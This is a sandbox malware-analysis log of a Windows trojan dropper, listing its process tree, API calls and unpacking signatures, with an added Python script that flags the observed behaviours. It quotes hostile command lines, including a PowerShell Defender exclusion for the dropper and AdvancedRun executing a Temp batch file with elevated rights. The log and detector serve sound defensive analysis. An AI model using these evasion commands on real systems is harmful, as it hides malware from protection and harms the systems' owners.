Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9DB0 ZwAlpcSetInformation, 24_2_6B4B9DB0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9C40 ZwAllocateVirtualMemoryEx, 24_2_6B4B9C40
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B475450 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread, 24_2_6B475450
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501C49 ZwQueryInformationProcess, 24_2_6B501C49
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548C75 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548C75
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 24_2_6B49746D
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501C76 ZwQueryInformationProcess, 24_2_6B501C76
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4AAC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint, 24_2_6B4AAC7B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B523C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory, 24_2_6B523C60
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B5C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory, 24_2_6B4B5C70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B9C70 ZwAlpcConnectPort, 24_2_6B4B9C70
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548C14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548C14
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B531411 ZwTraceEvent, 24_2_6B531411
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B0413 ZwUnmapViewOfSection, 24_2_6B4B0413
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47E420 RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlpLoadUserUIByPolicy,ZwClose, 24_2_6B47E420
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BA420 ZwGetNlsSectionPtr, 24_2_6B4BA420
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B49FC39 ZwAssociateWaitCompletionPacket, 24_2_6B49FC39
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B548CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B548CD6
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4ACCC0 memcpy,RtlGetNtSystemRoot,RtlInitUnicodeString,memcpy,ZwOpenKey,ZwClose,ZwEnumerateKey,DbgPrintEx,DbgPrintEx,DbgPrintEx, 24_2_6B4ACCC0
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B472CDB RtlFreeHeap,ZwClose,ZwSetEvent, 24_2_6B472CDB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47F4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 24_2_6B47F4E3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5314FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B5314FB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B5264FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose, 24_2_6B5264FB
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B501CE4 ZwQueryInformationProcess, 24_2_6B501CE4
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B534496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 24_2_6B534496
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4BA480 ZwInitializeNlsFiles, 24_2_6B4BA480
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4F3C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString, 24_2_6B4F3C93
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B47EC9B RtlInitUnicodeString,ZwOpenKey,RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlFreeHeap,ZwClose,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlAllocateHeap,RtlpLoadMachineUIByPolicy,ZwClose, 24_2_6B47EC9B
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B549CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 24_2_6B549CB3
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B4B0CA1 ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken, 24_2_6B4B0CA1
Source: C:\Users\user\AppData\Local\Temp\8615.exe Code function: 24_2_6B544CAB ZwTraceControl, 24_2_6B544CAB
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 26_2_02A948D8 NtAllocateVirtualMemory, 26_2_02A948D8
Source: C:\Users\user\AppData\Local\Temp\977B.exe Code function: 26_2_02A948D0 NtAllocateVirtualMemory, 26_2_02A948D0
Source: 8615.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 77DC.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 66A4.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 152F.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: bejhieg.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: cnv622JnZv.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\jejhieg
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@41/20@58/8
Source: C:\Users\user\AppData\Local\Temp\66A4.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 25_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 25_2_00401306
Source: cnv622JnZv.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 25_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource, 25_2_0040A33B
Source: C:\Users\user\Desktop\cnv622JnZv.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\cnv622JnZv.exe 'C:\Users\user\Desktop\cnv622JnZv.exe'
Source: C:\Users\user\Desktop\cnv622JnZv.exe Process created: C:\Users\user\Desktop\cnv622JnZv.exe 'C:\Users\user\Desktop\cnv622JnZv.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\jejhieg C:\Users\user\AppData\Roaming\jejhieg
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C5EA.exe C:\Users\user\AppData\Local\Temp\C5EA.exe
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Process created: C:\Users\user\AppData\Local\Temp\C5EA.exe C:\Users\user\AppData\Local\Temp\C5EA.exe
Source: C:\Users\user\AppData\Roaming\jejhieg Process created: C:\Users\user\AppData\Roaming\jejhieg C:\Users\user\AppData\Roaming\jejhieg
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\66A4.exe C:\Users\user\AppData\Local\Temp\66A4.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\77DC.exe C:\Users\user\AppData\Local\Temp\77DC.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8615.exe C:\Users\user\AppData\Local\Temp\8615.exe
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\977B.exe C:\Users\user\AppData\Local\Temp\977B.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\A557.exe C:\Users\user\AppData\Local\Temp\A557.exe
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /SpecialRun 4101d8 4380
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\B084.exe C:\Users\user\AppData\Local\Temp\B084.exe
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process created: C:\Users\user\AppData\Local\Temp\977B.exe 977B.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\152F.exe C:\Users\user\AppData\Local\Temp\152F.exe
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\2E26.exe C:\Users\user\AppData\Local\Temp\2E26.exe
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\977B.exe 'C:\Users\user\AppData\Local\Temp\977B.exe'
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process created: C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\cnv622JnZv.exe Process created: C:\Users\user\Desktop\cnv622JnZv.exe 'C:\Users\user\Desktop\cnv622JnZv.exe'
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\C5EA.exe C:\Users\user\AppData\Local\Temp\C5EA.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\66A4.exe C:\Users\user\AppData\Local\Temp\66A4.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\77DC.exe C:\Users\user\AppData\Local\Temp\77DC.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8615.exe C:\Users\user\AppData\Local\Temp\8615.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\977B.exe C:\Users\user\AppData\Local\Temp\977B.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\A557.exe C:\Users\user\AppData\Local\Temp\A557.exe
Source: C:\Users\user\AppData\Roaming\jejhieg Process created: C:\Users\user\AppData\Roaming\jejhieg C:\Users\user\AppData\Roaming\jejhieg
Source: C:\Users\user\AppData\Local\Temp\C5EA.exe Process created: C:\Users\user\AppData\Local\Temp\C5EA.exe C:\Users\user\AppData\Local\Temp\C5EA.exe
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /SpecialRun 4101d8 4380
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process created: C:\Users\user\AppData\Local\Temp\977B.exe 977B.exe
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process created: C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\A557.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\977B.exe Process created: unknown unknown
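The process-creation lines above are the raw evidence behind several signatures in the header: the PowerShell Add-MpPreference call that excludes the dropper from Defender, AdvancedRun launching a batch file with /RunAs 8 (read here as the tool's TrustedInstaller mode), a Temp-resident binary starting ComSvcConfig.exe (a .NET Framework utility that fits the hollowing signature), and binaries relaunching copies of themselves. The following is an added example and not part of the Joe Sandbox report: a small Python triage that encodes those patterns as heuristics and runs them over events constructed from the command lines shown above. The event field names (parent, image, cmdline) are this example's own, not a Sysmon or EDR schema.

```python
"""Process-creation triage modelled on the 'Process created' lines above.

Added example, not part of the Joe Sandbox report. The events are constructed
from the command lines the report shows; the field names (parent, image,
cmdline) are this example's own and not a Sysmon or EDR schema."""
from __future__ import annotations

import re
from dataclasses import dataclass

USER_TEMP = re.compile(r"\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.I)
DOTNET_FX = re.compile(r"\\Windows\\Microsoft\.NET\\Framework(64)?\\v[\d.]+\\", re.I)
SCRIPT = re.compile(r"\.(bat|cmd|ps1|vbs|js)\b", re.I)


@dataclass
class ProcEvent:
    parent: str    # image path of the creating process
    image: str     # image path of the new process
    cmdline: str   # full command line of the new process


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(ev: ProcEvent) -> list[str]:
    """Names of every heuristic the event trips, in a fixed order."""
    hits, cl = [], ev.cmdline
    # 1. Defender exclusion added through PowerShell (the 66A4.exe line). Needs the
    #    cmdlet and an -Exclusion* switch together; Add-MpPreference alone is admin work.
    if (_base(ev.image) in ("powershell.exe", "pwsh.exe")
            and re.search(r"\bAdd-MpPreference\b", cl, re.I)
            and re.search(r"-Exclusion(Path|Process|Extension)\b", cl, re.I)):
        hits.append("defender_exclusion")
    # 2. NirSoft AdvancedRun launching a batch file with /RunAs 8 (read here as the
    #    tool's TrustedInstaller mode). The tool is legitimate, so the script and the
    #    RunAs value are required, not the file name.
    if (_base(ev.image) == "advancedrun.exe"
            and re.search(r"/RunAs\s+8\b", cl, re.I)
            and re.search(r"/EXEFilename\s+'?[^'\s]+\.(bat|cmd)\b", cl, re.I)):
        hits.append("advancedrun_trustedinstaller_script")
    # 3. A script under the user's Temp folder anywhere on the command line
    #    (the 'Suspicious Script Execution From Temp Folder' Sigma hit in the header).
    if SCRIPT.search(cl) and USER_TEMP.search(cl):
        hits.append("temp_script_execution")
    # 4. A Temp-resident parent starting a .NET Framework utility such as
    #    ComSvcConfig.exe, a common host for hollowing by .NET loaders.
    if USER_TEMP.search(ev.parent) and DOTNET_FX.search(ev.image):
        hits.append("dotnet_utility_from_temp_parent")
    # 5. A Temp-resident binary starting a copy of itself (C5EA.exe, 977B.exe).
    #    Weak alone: AdvancedRun also relaunches itself with /SpecialRun.
    if ev.parent.lower() == ev.image.lower() and USER_TEMP.search(ev.image):
        hits.append("self_spawn_from_temp")
    return hits


def triage_all(events: list[ProcEvent]) -> list[list[str]]:
    return [triage(ev) for ev in events]


# Constructed events mirroring the report's lines (paths copied from them).
T = r"C:\Users\user\AppData\Local\Temp"
ADVDIR = T + r"\1196ed82-a1a7-4dc3-b900-4a59c1ae2518"
ADVRUN, BAT = ADVDIR + r"\AdvancedRun.exe", ADVDIR + r"\test.bat"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
COMSVC = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe"
SAMPLE_EVENTS = [
    ProcEvent(T + r"\C5EA.exe", T + r"\C5EA.exe", T + r"\C5EA.exe"),
    ProcEvent(T + r"\66A4.exe", ADVRUN, f"'{ADVRUN}' /EXEFilename '{BAT}' /WindowState ''0'' "
              "/PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run"),
    ProcEvent(T + r"\66A4.exe", PS, f"'{PS.replace('SysWOW64', 'System32')}' Add-MpPreference "
              f"-ExclusionPath '{T}\\66A4.exe' -Force"),
    ProcEvent(T + r"\66A4.exe", COMSVC, COMSVC),
    ProcEvent(ADVRUN, ADVRUN, f"'{ADVRUN}' /SpecialRun 4101d8 4380"),
]

if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, triage_all(SAMPLE_EVENTS)):
        print(f"{_base(ev.image):>18}  {', '.join(hits) or '-'}")
```

Rules 1 and 2 are the high-confidence ones; rules 3 to 5 are context that should raise a score rather than alert on their own (a developer's build script in Temp, or AdvancedRun relaunching itself with /SpecialRun, trips them on a clean host). In a real pipeline the parent path of rule 1 would also be weighted: an exclusion added by a binary in the user's Temp folder, as here, is far more suspicious than the same cmdlet run from an admin console.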
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 25_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 25_2_00408FC9
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 30_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 30_2_00408FC9
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C5EA.tmp Jump to behavior
Source: A557.exe, 0000001D.00000000.427496231.00000000002D2000.00000002.00020000.sdmp Binary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
Source: A557.exe, 0000001D.00000000.427496231.00000000002D2000.00000002.00020000.sdmp Binary or memory string: UPDATE [dbo].[Details] SET [Employee Id] = @Employee_Id, [Title] = @Title, [First Name] = @First_Name, [Last Name] = @Last_Name, [Email] = @Email, [Phone Number] = @Phone_Number, [Hire Date] = @Hire_Date, [Date of Birth] = @Date_of_Birth, [Basic Pay] = @Basic_Pay, [House Rental Allowance] = @House_Rental_Allowance, [Dearness Allowance] = @Dearness_Allowance, [Provident Fund] = @Provident_Fund, [Date of Leaving] = @Date_of_Leaving, [Grade] = @Grade WHERE (([Employee Id] = @Original_Employee_Id) AND ([Title] = @Original_Title) AND ([First Name] = @Original_First_Name) AND ([Last Name] = @Original_Last_Name) AND ((@IsNull_Phone_Number = 1 AND [Phone Number] IS NULL) OR ([Phone Number] = @Original_Phone_Number)) AND ([Hire Date] = @Original_Hire_Date) AND ([Date of Birth] = @Original_Date_of_Birth) AND ([Basic Pay] = @Original_Basic_Pay) AND ((@IsNull_House_Rental_Allowance = 1 AND [House Rental Allowance] IS NULL) OR ([House Rental Allowance] = @Original_House_Rental_Allowance)) AND ((@IsNull_Dearness_Allowance = 1 AND [Dearness Allowance] IS NULL) OR ([Dearness Allowance] = @Original_Dearness_Allowance)) AND ((@IsNull_Provident_Fund = 1 AND [Provident Fund] IS NULL) OR ([Provident Fund] = @Original_Provident_Fund)) AND ((@IsNull_Date_of_Leaving = 1 AND [Date of Leaving] IS NULL) OR ([Date of Leaving] = @Original_Date_of_Leaving)) AND ([Grade] = @Original_Grade));
Source: C:\Users\user\AppData\Local\Temp\66A4.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\977B.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\A557.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe Code function: 25_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle, 25_2_004095FD
Source: 977B.exe.6.dr, ??????????????/_?????xptkvqfesn.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Users\user\AppData\Local\Temp\66A4.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\66A4.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\77DC.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A557.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\A557.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\152F.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\152F.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\66A4.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8615.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: cnv622JnZv.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: cnv622JnZv.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: cnv622JnZv.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: cnv622JnZv.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cnv622JnZv.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: cnv622JnZv.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: cnv622JnZv.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\vojos\fuw.pdb source: 8615.exe, 00000018.00000000.413528464.0000000000417000.00000002.00020000.sdmp
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000019.00000000.418963154.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001E.00000000.426329937.000000000040C000.00000002.00020000.sdmp
Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: 977B.exe
Source: Binary string: C:\wucalehozojoh\setujupiwe-y.pdb source: C5EA.exe, 00000011.00000000.349456240.0000000000401000.00000020.00020000.sdmp, C5EA.exe, 00000012.00000000.364889434.0000000000401000.00000020.00020000.sdmp
Source: Binary string: C:\zowazaxopomuh-39\t.pdb source: cnv622JnZv.exe, 00000000.00000000.243398633.0000000000401000.00000020.00020000.sdmp, cnv622JnZv.exe, 00000003.00000000.254610819.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000010.00000000.348546236.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000013.00000000.368105637.0000000000401000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: 8615.exe, 00000018.00000002.441461960.000000006B451000.00000020.00020000.sdmp
Source: Binary string: wntdll.pdb source: 8615.exe
Source: Binary string: DC:\zowazaxopomuh-39\t.pdb source: cnv622JnZv.exe, 00000000.00000000.243398633.0000000000401000.00000020.00020000.sdmp, cnv622JnZv.exe, 00000003.00000000.254610819.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000010.00000000.348546236.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000013.00000000.368105637.0000000000401000.00000020.00020000.sdmp

Data Obfuscation:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\152F.exe Unpacked PE file: 35.2.152F.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\152F.exe Unpacked PE file: 35.2.152F.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\8615.exe Unpacked PE file: 24.2.8615.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.cipizi:R;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\152F.exe Unpacked PE file: 35.2.152F.exe.400000.0.unpack .text:ER;.data:W;.rulofiv:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\cnv622JnZv.exe Code function: 0_2_02EC1118 push ds; ret 0_2_02EC1125
Source: C:\Users\user\AppData\Local\Temp\77DC.exe Code function: 23_2_00A7D37C push esi; iretd 23_2_00A7D388
